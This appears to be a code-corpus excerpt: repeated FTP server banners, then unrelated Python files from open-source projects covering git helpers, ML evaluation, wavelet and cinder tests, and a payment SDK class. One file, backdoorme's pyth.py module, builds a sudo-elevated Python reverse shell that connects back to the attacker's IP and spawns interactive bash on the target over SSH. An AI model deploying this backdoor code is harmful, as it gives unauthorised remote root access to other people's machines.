"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:31. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:32. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 01:33. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:34. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:34. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:35. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"""
|
src/scriv/gitinfo.py | kurtmckee/scriv | 110 | 11096438 |
"""Get information from git."""
import logging
import os
import subprocess
import sys
from pathlib import Path
import click
from .shell import run_command, run_simple_command
logger = logging.getLogger()
def user_nick() -> str:
"""
Get a short name for the current user.
"""
ok, out = run_command("git config --get github.user")
if ok:
return out.strip()
ok, out = run_command("git config --get user.email")
if ok:
nick = out.partition("@")[0]
return nick
return os.getenv("USER", "somebody")
def current_branch_name() -> str:
"""
Get the current branch name.
"""
return run_simple_command("git rev-parse --abbrev-ref HEAD")
def git_config(option: str) -> str:
"""
Return a git config value.
"""
return run_simple_command("git config --get {}".format(option))
def git_config_bool(option: str) -> bool:
"""
Return a boolean git config value, defaulting to False.
"""
return git_config(option) == "true"
def git_editor() -> str:
"""
Get the command name of the editor Git will launch.
"""
return run_simple_command("git var GIT_EDITOR")
def git_edit(filename: Path) -> None:
"""Edit a file using the same editor Git chooses."""
click.edit(filename=str(filename), editor=git_editor())
def git_add(filename: Path) -> None:
"""Git add a file. If it fails, sys.exit."""
ret = subprocess.call(["git", "add", str(filename)])
if ret == 0:
logger.info("Added {}".format(filename))
else:
logger.error("Couldn't add {}".format(filename))
sys.exit(ret)
def git_rm(filename: Path) -> None:
"""Git rm a file. If it fails, sys.exit."""
ret = subprocess.call(["git", "rm", str(filename)])
if ret == 0:
logger.info("Removed {}".format(filename))
else:
logger.error("Couldn't remove {}".format(filename))
sys.exit(ret)
|
backdoors/shell/pyth.py | mehrdad-shokri/backdoorme | 796 | 11096461 |
from backdoors.backdoor import *
class Pyth(Backdoor):
prompt = Fore.RED + "(py) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Python module..."
self.core = core
self.options = {
"port" : Option("port", 53922, "port to connect to", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = INFO + "Uses a short python script to listen for commands and send output back to the user."
def get_command(self):
command = "echo " + self.core.curtarget.pword + " | sudo -S python -c \"import socket, subprocess, os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); \
s.connect(('" + self.core.localIP + "', " + str(self.get_value("port")) + ")); \
os.dup2(s.fileno(),0); \
os.dup2(s.fileno(),1); \
os.dup2(s.fileno(),2); \
subprocess.call(['/bin/bash', '-i'])\" "
#print(command)
return command
def do_exploit(self, args):
self.listen()
self.core.curtarget.ssh.exec_command(self.get_command())
print(GOOD + "Python backdoor on %s attempted." % self.get_value("port"))
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit() |
mindspore/python/mindspore/_extends/remote/kernel_build_server_ascend.py | PowerOlive/mindspore | 3,200 | 11096474 |
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""kernel build server for ascend"""
import sys
import warnings
import json
from mindspore._extends.parallel_compile.tbe_compiler.tbe_job_manager import TbeJobManager
from mindspore._extends.remote.kernel_build_server import Messager, get_logger, AkgBuilder
class AscendMessager(Messager):
"""
Ascend Messager
It works as a server, communicating with c++ client.
"""
def __init__(self, fdin, fdout):
super().__init__(fdin, fdout)
get_logger().info("[TRACE] Ascend Messager init...")
self.tbe_builder = TbeJobManager()
self.akg_builder = AkgBuilder("ASCEND")
def handle(self):
"""
Communicate with remote client.
Reference protocol between them at PR#3821 and PR#3935
"""
arg = self.get_message()
if arg.startswith('AKG'):
self.akg_builder.handle(self, arg)
else:
job_json = dict()
try:
job_json = json.loads(arg)
except json.decoder.JSONDecodeError:
get_logger().error("[TRACE] Request is not a json message: {}".format(arg))
self.send_ack(False)
self.exit()
finally:
pass
if "job_type" in job_json:
res = self.tbe_builder.job_handler(arg)
self.send_res(res)
else:
get_logger().error("[TRACE] Request is not a TBE Job message: {}".format(arg))
self.send_ack(False)
self.exit()
def exit(self):
self.tbe_builder.reset()
get_logger().info("[TRACE] Ascend Messager Exit...")
exit()
if __name__ == '__main__':
warnings.simplefilter("ignore")
if len(sys.argv) != 3:
raise Exception('Incorrect argv: {}'.format(sys.argv))
get_logger().debug(f"[TRACE] argv: {str(sys.argv)}")
messager = AscendMessager(int(sys.argv[1]), int(sys.argv[2]))
messager.run()
|
VisualBERT/mmf/trainers/core/evaluation_loop.py | Fostereee/Transformer-MM-Explainability | 322 | 11096498 | # Copyright (c) Facebook, Inc. and its affiliates.
import logging
from abc import ABC
from typing import Any, Dict, Tuple, Type
import torch
import tqdm
from VisualBERT.mmf.common.meter import Meter
from VisualBERT.mmf.common.report import Report
from VisualBERT.mmf.common.sample import to_device
from VisualBERT.mmf.utils.distributed import is_master
from VisualBERT.mmf.models.transformers.backends import ExplanationGenerator
from VisualBERT import perturbation_arguments
logger = logging.getLogger(__name__)
class TrainerEvaluationLoopMixin(ABC):
def evaluation_loop(
self, loader, use_tqdm: bool = False, single_batch: bool = False
) -> Tuple[Dict[str, Any], Type[Meter]]:
meter = Meter()
with torch.no_grad():
self.model.eval()
disable_tqdm = not use_tqdm or not is_master()
combined_report = None
for batch in tqdm.tqdm(loader, disable=disable_tqdm):
report = self._forward(batch)
self.update_meter(report, meter)
# accumulate necessary params for metric calculation
if combined_report is None:
combined_report = report
else:
combined_report.accumulate_tensor_fields_and_loss(
report, self.metrics.required_params
)
combined_report.batch_size += report.batch_size
if single_batch is True:
break
combined_report.metrics = self.metrics(combined_report, combined_report)
self.update_meter(combined_report, meter, eval_mode=True)
# enable train mode again
self.model.train()
return combined_report, meter
def prediction_loop(self, dataset_type: str) -> None:
reporter = self.dataset_loader.get_test_reporter(dataset_type)
with torch.no_grad():
self.model.eval()
logger.info(f"Starting {dataset_type} inference predictions")
while reporter.next_dataset():
dataloader = reporter.get_dataloader()
for batch in tqdm.tqdm(dataloader):
prepared_batch = reporter.prepare_batch(batch)
prepared_batch = to_device(prepared_batch, torch.device("cuda"))
with torch.cuda.amp.autocast(enabled=self.training_config.fp16):
model_output = self.model(prepared_batch)
report = Report(prepared_batch, model_output)
reporter.add_to_report(report, self.model)
logger.info("Finished predicting")
self.model.train()
class TrainerEvaluationLoopMixinPert(ABC):
def evaluation_loop(self, loader, on_test_end, use_tqdm: bool = False):
self.model.eval()
expl = ExplanationGenerator.SelfAttentionGenerator(self.model)
method = perturbation_arguments.args.method
pert_type = "pos" if perturbation_arguments.args.is_positive_pert else "neg"
modality = "text" if perturbation_arguments.args.is_text_pert else "image"
num_samples = perturbation_arguments.args.num_samples
method_expl = {"transformer_attribution": expl.generate_transformer_att,
"ours_no_lrp": expl.generate_ours,
"partial_lrp": expl.generate_partial_lrp,
"raw_attn": expl.generate_raw_attn,
"attn_gradcam": expl.generate_attn_gradcam,
"rollout": expl.generate_rollout}
i = 0
# saving cams per method for all the samples
self.model.eval()
disable_tqdm = not use_tqdm or not is_master()
if modality == "image":
steps = [0, 0.5, 0.75, 0.95, 0.96, 0.97, 0.98, 0.99, 1]
else:
steps = [0, 0.25, 0.5, 0.75, 0.8, 0.85, 0.9, 0.95, 1]
step_acc = [0] * len(steps)
print("test type {0} pert type {1} expl type {2}".format(modality, pert_type, method))
for batch in tqdm.tqdm(loader, disable=disable_tqdm):
method_cam = method_expl[method](batch)
if pert_type == "pos":
method_cam *= -1
if modality == "image":
input_mask = batch['input_mask']
bbox_scores = method_cam[0, input_mask.sum(1):]
image_boxes_len = len(bbox_scores)
image_features = batch['image_feature_0'].clone()
image_bboxes = batch['image_info_0']['bbox'][0].copy()
for step_idx, step in enumerate(steps):
curr_num_tokens = int((1 - step) * image_boxes_len)
# find top step boxes
_, top_bboxes_indices = bbox_scores.topk(k=curr_num_tokens, dim=-1)
top_bboxes_indices = top_bboxes_indices.cpu().data.numpy()
# remove the top step boxes from the batch info
batch['image_feature_0'] = image_features[:, top_bboxes_indices, :]
batch['image_info_0']['bbox'][0] = image_bboxes[top_bboxes_indices]
batch['image_info_0']['max_features'] = torch.tensor(curr_num_tokens).to(batch['image_feature_0'].device).view(1)
batch['image_info_0']['num_boxes'][0] = curr_num_tokens
report = self._forward(batch)
step_acc[step_idx] += report["targets"][0,report["scores"].argmax()].item()
i += 1
if i > num_samples:
break
else:
input_mask = batch['input_mask'].clone()
# the CLS here is ?
cls_index = (input_mask.sum(1) - 2).item()
seg_ids = batch["segment_ids"].clone()
# we don't count the ? token since it's the equivalent to CLS here
# and we want to keep the CLS intact
text_scores = method_cam[0, 1:cls_index]
text_len = len(text_scores)
input_ids = batch['input_ids'].clone()
tokens = batch['tokens'].copy()
for step_idx, step in enumerate(steps):
curr_num_tokens = int((1 - step) * text_len)
# find top step tokens
_, top_bboxes_indices = text_scores.topk(k=curr_num_tokens, dim=-1)
top_bboxes_indices = top_bboxes_indices.cpu().data.numpy()
# sorting for positional embedding
top_bboxes_indices = list(top_bboxes_indices)
# add the last 2 tokens (CLS+SEP)
top_bboxes_indices = [0, cls_index, cls_index+1] +\
[top_bboxes_indices[i] + 1 for i in range(len(top_bboxes_indices))]
top_bboxes_indices = sorted(top_bboxes_indices)
# modify the first tokens of the input mask
input_mask_indices = top_bboxes_indices + \
[i for i in range(input_mask.sum(1), input_mask.shape[1])]
# remove the top step boxes from the batch info
batch['input_ids'] = input_ids[:, top_bboxes_indices]
batch['tokens'] = [[tokens[0][i] for i in top_bboxes_indices]]
batch['input_mask'] = input_mask[:, input_mask_indices]
batch["segment_ids"] = seg_ids[:, input_mask_indices]
report = self._forward(batch)
step_acc[step_idx] += report["targets"][0, report["scores"].argmax()].item()
i += 1
if i > num_samples:
break
print("pert type {0}".format(pert_type))
step_acc = [acc / num_samples * 100 for acc in step_acc]
print(step_acc)
|
onir/datasets/query_iter.py | tgeral68/OpenNIR | 140 | 11096510 | from onir import util
@util.allow_redefinition_iter
def query_iter(dataset,
fields: set,
shuf: bool = False,
random=None
):
qids = dataset.all_query_ids()
if shuf:
qids = list(qids)
random.shuffle(qids)
for qid in qids:
record = dataset.build_record(fields, query_id=qid)
yield {f: record[f] for f in fields}
class QueryIter:
def __init__(self, dataset, fields, shuf=False, random=None):
self.it = query_iter(dataset, fields, shuf, random)
self.consumed = 0
self.len = dataset.num_queries()
def __next__(self):
self.consumed += 1
return next(self.it)
def __iter__(self):
return self
def __length_hint__(self):
return max(self.len - self.consumed, 0)
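# --- Illustrative usage sketch (editor addition, not part of OpenNIR) ---
# QueryIter only needs a dataset object exposing all_query_ids(), build_record()
# and num_queries(); the toy dataset below is hypothetical and exists purely to
# show the shape of the records yielded.
class _ToyDataset:
    _queries = {"q1": "tide gauge data", "q2": "storm surge model"}
    def all_query_ids(self):
        return list(self._queries)
    def num_queries(self):
        return len(self._queries)
    def build_record(self, fields, query_id):
        return {"query_id": query_id, "query_text": self._queries[query_id]}
if __name__ == "__main__":
    it = QueryIter(_ToyDataset(), fields={"query_id", "query_text"})
    print(it.__length_hint__())  # 2 before anything is consumed
    for record in it:
        print(record)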
|
torch/distributed/constants.py | MagiaSN/pytorch | 206 | 11096521 | from datetime import timedelta
# Default process group wide timeout, if applicable.
# This only applies to the gloo and nccl backends
# (only if NCCL_BLOCKING_WAIT or NCCL_ASYNC_ERROR_HANDLING is set to 1).
# To make an attempt at backwards compatibility with THD, we use an
# extraordinarily high default timeout, given that THD did not have timeouts.
default_pg_timeout = timedelta(minutes=30)
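# --- Illustrative sketch (editor addition, not part of upstream PyTorch) ---
# ``default_pg_timeout`` is the value ``torch.distributed.init_process_group``
# falls back to when no ``timeout=`` argument is passed; callers can supply a
# shorter timedelta to surface hangs sooner. The 5-minute value below is a
# hypothetical override chosen only for illustration.
if __name__ == "__main__":
    custom_timeout = timedelta(minutes=5)
    print("default process group timeout:", default_pg_timeout)
    print("example custom value to pass as timeout=:", custom_timeout)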
|
alipay/aop/api/response/AlipayFundJointaccountDetailQueryResponse.py | antopen/alipay-sdk-python-all | 213 | 11096542 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.JointAccountQuotaRespDTO import JointAccountQuotaRespDTO
from alipay.aop.api.domain.AuthorizedRuleDTO import AuthorizedRuleDTO
from alipay.aop.api.domain.InviteResultDTO import InviteResultDTO
from alipay.aop.api.domain.JointAccountMemberInfoRespDTO import JointAccountMemberInfoRespDTO
class AlipayFundJointaccountDetailQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayFundJointaccountDetailQueryResponse, self).__init__()
self._account_id = None
self._account_name = None
self._account_quota = None
self._account_status = None
self._agreement_no = None
self._authorized_rule = None
self._available_balance = None
self._biz_scene = None
self._creator_id = None
self._creator_out_id = None
self._freeze_balance = None
self._invite_result_list = None
self._member_list = None
self._product_code = None
@property
def account_id(self):
return self._account_id
@account_id.setter
def account_id(self, value):
self._account_id = value
@property
def account_name(self):
return self._account_name
@account_name.setter
def account_name(self, value):
self._account_name = value
@property
def account_quota(self):
return self._account_quota
@account_quota.setter
def account_quota(self, value):
if isinstance(value, list):
self._account_quota = list()
for i in value:
if isinstance(i, JointAccountQuotaRespDTO):
self._account_quota.append(i)
else:
self._account_quota.append(JointAccountQuotaRespDTO.from_alipay_dict(i))
@property
def account_status(self):
return self._account_status
@account_status.setter
def account_status(self, value):
self._account_status = value
@property
def agreement_no(self):
return self._agreement_no
@agreement_no.setter
def agreement_no(self, value):
self._agreement_no = value
@property
def authorized_rule(self):
return self._authorized_rule
@authorized_rule.setter
def authorized_rule(self, value):
if isinstance(value, AuthorizedRuleDTO):
self._authorized_rule = value
else:
self._authorized_rule = AuthorizedRuleDTO.from_alipay_dict(value)
@property
def available_balance(self):
return self._available_balance
@available_balance.setter
def available_balance(self, value):
self._available_balance = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def creator_id(self):
return self._creator_id
@creator_id.setter
def creator_id(self, value):
self._creator_id = value
@property
def creator_out_id(self):
return self._creator_out_id
@creator_out_id.setter
def creator_out_id(self, value):
self._creator_out_id = value
@property
def freeze_balance(self):
return self._freeze_balance
@freeze_balance.setter
def freeze_balance(self, value):
self._freeze_balance = value
@property
def invite_result_list(self):
return self._invite_result_list
@invite_result_list.setter
def invite_result_list(self, value):
if isinstance(value, list):
self._invite_result_list = list()
for i in value:
if isinstance(i, InviteResultDTO):
self._invite_result_list.append(i)
else:
self._invite_result_list.append(InviteResultDTO.from_alipay_dict(i))
@property
def member_list(self):
return self._member_list
@member_list.setter
def member_list(self, value):
if isinstance(value, list):
self._member_list = list()
for i in value:
if isinstance(i, JointAccountMemberInfoRespDTO):
self._member_list.append(i)
else:
self._member_list.append(JointAccountMemberInfoRespDTO.from_alipay_dict(i))
@property
def product_code(self):
return self._product_code
@product_code.setter
def product_code(self, value):
self._product_code = value
def parse_response_content(self, response_content):
response = super(AlipayFundJointaccountDetailQueryResponse, self).parse_response_content(response_content)
if 'account_id' in response:
self.account_id = response['account_id']
if 'account_name' in response:
self.account_name = response['account_name']
if 'account_quota' in response:
self.account_quota = response['account_quota']
if 'account_status' in response:
self.account_status = response['account_status']
if 'agreement_no' in response:
self.agreement_no = response['agreement_no']
if 'authorized_rule' in response:
self.authorized_rule = response['authorized_rule']
if 'available_balance' in response:
self.available_balance = response['available_balance']
if 'biz_scene' in response:
self.biz_scene = response['biz_scene']
if 'creator_id' in response:
self.creator_id = response['creator_id']
if 'creator_out_id' in response:
self.creator_out_id = response['creator_out_id']
if 'freeze_balance' in response:
self.freeze_balance = response['freeze_balance']
if 'invite_result_list' in response:
self.invite_result_list = response['invite_result_list']
if 'member_list' in response:
self.member_list = response['member_list']
if 'product_code' in response:
self.product_code = response['product_code']
|
pywt/tests/test_wpnd.py | tbbharaj/pywt | 1,435 | 11096551 |
#!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from itertools import product
from functools import reduce
import operator
import numpy as np
from numpy.testing import (assert_allclose, assert_, assert_raises,
assert_equal)
import pywt
def test_traversing_tree_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
assert_(np.all(wp.data == x))
assert_(wp.path == '')
assert_(wp.level == 0)
assert_(wp.maxlevel == 3)
assert_allclose(wp['aa'].data, np.array([[3., 7., 11., 15.]] * 4),
rtol=1e-12)
assert_allclose(wp['da'].data, np.zeros((4, 4)), rtol=1e-12, atol=1e-14)
assert_allclose(wp['ad'].data, -np.ones((4, 4)), rtol=1e-12, atol=1e-14)
assert_allclose(wp['dd'].data, np.zeros((4, 4)), rtol=1e-12, atol=1e-14)
assert_allclose(wp['aa'*2].data, np.array([[10., 26.]] * 2), rtol=1e-12)
    # __getitem__ using a tuple access instead
assert_allclose(wp[('aa', 'aa')].data, np.array([[10., 26.]] * 2),
rtol=1e-12)
assert_(wp['aa']['aa'].data is wp['aa'*2].data)
assert_allclose(wp['aa'*3].data, np.array([[36.]]), rtol=1e-12)
assert_raises(IndexError, lambda: wp['aa'*(wp.maxlevel+1)])
assert_raises(ValueError, lambda: wp['f'])
# getitem input must be a string or tuple of strings
assert_raises(TypeError, wp.__getitem__, (5, 3))
assert_raises(TypeError, wp.__getitem__, 5)
def test_accessing_node_attributes_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
assert_allclose(wp['aa'+'ad'].data, np.zeros((2, 2)) - 4, rtol=1e-12)
assert_(wp['aa'+'ad'].path == 'aa'+'ad')
assert_(wp['aa'+'ad'].node_name == 'ad')
assert_(wp['aa'+'ad'].parent.path == 'aa')
assert_allclose(wp['aa'+'ad'].parent.data,
np.array([[3., 7., 11., 15.]] * 4), rtol=1e-12)
# can also index via a tuple instead of concatenated strings
assert_(wp[('aa', 'ad')].level == 2)
assert_(wp[('aa', 'ad')].maxlevel == 3)
assert_(wp[('aa', 'ad')].mode == 'symmetric')
# can access a node's path as either a single string or in tuple form
node = wp[('ad', 'dd')]
assert_(node.path == 'addd')
assert_(node.path_tuple == ('ad', 'dd'))
def test_collecting_nodes_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
assert_(len(wp.get_level(0)) == 1)
assert_(wp.get_level(0)[0].path == '')
# First level
assert_(len(wp.get_level(1)) == 4)
assert_(
[node.path for node in wp.get_level(1)] == ['aa', 'ad', 'da', 'dd'])
# Second and third levels
for lev in [2, 3]:
assert_(len(wp.get_level(lev)) == (2**x.ndim)**lev)
paths = [node.path for node in wp.get_level(lev)]
expected_paths = [
reduce(operator.add, p) for
p in sorted(product(['aa', 'ad', 'da', 'dd'], repeat=lev))]
assert_(paths == expected_paths)
def test_data_reconstruction_delete_nodes_nd():
x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
# The user must supply either data or axes
assert_raises(ValueError, pywt.WaveletPacketND, data=None, wavelet='db1',
axes=None)
new_wp = pywt.WaveletPacketND(data=None, wavelet='db1', mode='symmetric',
axes=range(x.ndim))
new_wp['ad'+'da'] = wp['ad'+'da'].data
new_wp['ad'*2] = wp['ad'+'da'].data
new_wp['ad'+'dd'] = np.zeros((2, 2), dtype=np.float64)
new_wp['aa'] = [[3.0, 7.0, 11.0, 15.0]] * 4
new_wp['dd'] = np.zeros((4, 4), dtype=np.float64)
new_wp['da'] = wp['da'] # all zeros
assert_allclose(new_wp.reconstruct(update=False),
np.array([[1.5, 1.5, 3.5, 3.5, 5.5, 5.5, 7.5, 7.5]] * 8),
rtol=1e-12)
new_wp['ad'+'aa'] = wp['ad'+'aa'].data
assert_allclose(new_wp.reconstruct(update=False), x, rtol=1e-12)
del(new_wp['ad'+'aa'])
# TypeError on accessing deleted node
assert_raises(TypeError, lambda: new_wp['ad'+'aa'])
new_wp['ad'+'aa'] = wp['ad'+'aa'].data
assert_(new_wp.data is None)
assert_allclose(new_wp.reconstruct(update=True), x, rtol=1e-12)
assert_allclose(new_wp.data, x, rtol=1e-12)
# TODO: decompose=True
def test_wavelet_packet_dtypes():
shape = (16, 8, 8)
for dtype in [np.float32, np.float64, np.complex64, np.complex128]:
x = np.random.randn(*shape).astype(dtype)
if np.iscomplexobj(x):
x = x + 1j*np.random.randn(*shape).astype(x.real.dtype)
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric')
# no unnecessary copy made
assert_(wp.data is x)
# full decomposition
wp.get_level(wp.maxlevel)
# reconstruction from coefficients should preserve dtype
r = wp.reconstruct(False)
assert_equal(r.dtype, x.dtype)
assert_allclose(r, x, atol=1e-6, rtol=1e-6)
def test_wavelet_packet_axes():
rstate = np.random.RandomState(0)
shape = (32, 16, 8)
x = rstate.standard_normal(shape)
for axes in [(0, 1), 1, (-3, -2, -1), (0, 2), (1, )]:
wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric',
axes=axes)
# partial decomposition
nodes = wp.get_level(1)
# size along the transformed axes has changed
for ax2 in range(x.ndim):
            if ax2 in tuple(np.atleast_1d(axes) % x.ndim):
                assert_(nodes[0].data.shape[ax2] < x.shape[ax2])
            else:
                assert_(nodes[0].data.shape[ax2] == x.shape[ax2])
        # reconstruction from coefficients should preserve dtype
r = wp.reconstruct(False)
assert_equal(r.dtype, x.dtype)
assert_allclose(r, x, atol=1e-12, rtol=1e-12)
# must have non-duplicate axes
assert_raises(ValueError, pywt.WaveletPacketND, data=x, wavelet='db1',
axes=(0, 0))
|
cinder/tests/unit/backup/drivers/test_backup_glusterfs.py | helenwalsh/cinder | 571 | 11096601 | # Copyright (c) 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for GlusterFS backup driver."""
import os
from unittest import mock
from os_brick.remotefs import remotefs as remotefs_brick
from cinder.backup.drivers import glusterfs
from cinder import context
from cinder import exception
from cinder.tests.unit import test
from cinder import utils
FAKE_BACKUP_MOUNT_POINT_BASE = '/fake/mount-point-base'
FAKE_HOST = 'fake_host'
FAKE_VOL_NAME = 'backup_vol'
FAKE_BACKUP_SHARE = '%s:%s' % (FAKE_HOST, FAKE_VOL_NAME)
FAKE_BACKUP_PATH = os.path.join(FAKE_BACKUP_MOUNT_POINT_BASE,
'e51e43e3c63fd5770e90e58e2eafc709')
class BackupGlusterfsShareTestCase(test.TestCase):
def setUp(self):
super(BackupGlusterfsShareTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_check_configuration(self):
self.override_config('glusterfs_backup_share', FAKE_BACKUP_SHARE)
self.mock_object(glusterfs.GlusterfsBackupDriver,
'_init_backup_repo_path',
return_value=FAKE_BACKUP_PATH)
driver = glusterfs.GlusterfsBackupDriver(self.ctxt)
driver.check_for_setup_error()
def test_check_configuration_no_backup_share(self):
self.override_config('glusterfs_backup_share', None)
self.mock_object(glusterfs.GlusterfsBackupDriver,
'_init_backup_repo_path',
return_value=FAKE_BACKUP_PATH)
driver = glusterfs.GlusterfsBackupDriver(self.ctxt)
self.assertRaises(exception.InvalidConfigurationValue,
driver.check_for_setup_error)
def test_init_backup_repo_path(self):
self.override_config('glusterfs_backup_share', FAKE_BACKUP_SHARE)
self.override_config('glusterfs_backup_mount_point',
FAKE_BACKUP_MOUNT_POINT_BASE)
mock_remotefsclient = mock.Mock()
mock_remotefsclient.get_mount_point = mock.Mock(
return_value=FAKE_BACKUP_PATH)
self.mock_object(glusterfs.GlusterfsBackupDriver,
'check_for_setup_error')
self.mock_object(remotefs_brick, 'RemoteFsClient',
return_value=mock_remotefsclient)
self.mock_object(os, 'getegid',
return_value=333333)
self.mock_object(utils, 'get_file_gid',
return_value=333333)
self.mock_object(utils, 'get_file_mode',
return_value=00000)
self.mock_object(utils, 'get_root_helper')
with mock.patch.object(glusterfs.GlusterfsBackupDriver,
'_init_backup_repo_path'):
driver = glusterfs.GlusterfsBackupDriver(self.ctxt)
self.mock_object(driver, '_execute')
path = driver._init_backup_repo_path()
self.assertEqual(FAKE_BACKUP_PATH, path)
utils.get_root_helper.called_once()
mock_remotefsclient.mount.assert_called_once_with(FAKE_BACKUP_SHARE)
mock_remotefsclient.get_mount_point.assert_called_once_with(
FAKE_BACKUP_SHARE)
|
dnachisel/biotools/formatting_operations.py | simone-pignotti/DnaChisel | 124 | 11096646 | """Text and number formatting operations"""
from copy import deepcopy
import json
import numpy as np
def round_all_numbers_in_dict(d, rounding_digits=2, outplace=True):
""" Return a new version of dict d with all floats rounded to N digits."""
if outplace:
d = deepcopy(d)
for k, v in d.items():
if isinstance(v, float):
d[k] = np.round(v, rounding_digits)
if isinstance(v, dict):
round_all_numbers_in_dict(v, rounding_digits, outplace=False)
return d
def dict_to_pretty_string(d, rounding_digits=2, indent=2):
"""Return a nicely JSON-like formatted string to print a dict."""
d = round_all_numbers_in_dict(d, rounding_digits)
formatted_text = json.dumps(d, indent=indent)
for char in '{}",':
formatted_text = formatted_text.replace(char, "")
return formatted_text
def score_to_formatted_string(score, characters=9):
"""Transform a number (score) into a best-format string.
The format will be either int (2234), float (10.234) or engineering
    (1.20E5), whichever is shorter. The score is then left-padded with
    whitespace to obtain the desired number of ``characters``."""
raw = str(int(score) if (int(score) == score) else score)
as_float = "%.02f" % score
as_eng = "%.02E." % score
return min([raw, as_float, as_eng], key=len).rjust(characters) |
qf_lib_tests/unit_tests/portfolio_construction/test_black_litterman.py | webclinic017/qf-lib | 198 | 11096675 |
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import TestCase
import numpy as np
from pandas import DataFrame, Series
from qf_lib.portfolio_construction.black_litterman.black_litterman import BlackLitterman
# THIS TEST REQUIRES TAU CALCULATION AS: 1 / nr_of_observations
class TestBlackLitterman(TestCase):
@classmethod
def setUpClass(cls):
cls.hist_cov_data = np.array([[0.00490, 0.00672, 0.01050, 0.01680],
[0.00672, 0.01440, 0.02520, 0.03600],
[0.01050, 0.02520, 0.09000, 0.14400],
[0.01680, 0.03600, 0.14400, 0.36000]])
cls.weights_data = [0.05, 0.40, 0.45, 0.10]
cls.names = ['A1', 'A2', 'A3', 'A4']
cls.hist_cov = DataFrame(cls.hist_cov_data, columns=cls.names, index=cls.names)
cls.weights = Series(data=cls.weights_data, index=cls.names)
cls.number_of_data_points = 120
def test_bl_model_components(self):
bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points)
print("=====> LAMBDA")
lambda_ = bl.calculate_lambda()
print(lambda_)
self.assertAlmostEqual(lambda_, 2.2369058, places=6)
prior_mean, prior_cov = bl.calculate_prior()
print("=====> Prior Mean")
print(prior_mean)
exact_mean = np.zeros(4)
exact_mean[0] = 0.0208882
exact_mean[1] = 0.0470556
exact_mean[2] = 0.1465285
exact_mean[3] = 0.2595706
self.assertTrue(np.allclose(prior_mean, exact_mean, rtol=0, atol=1e-6))
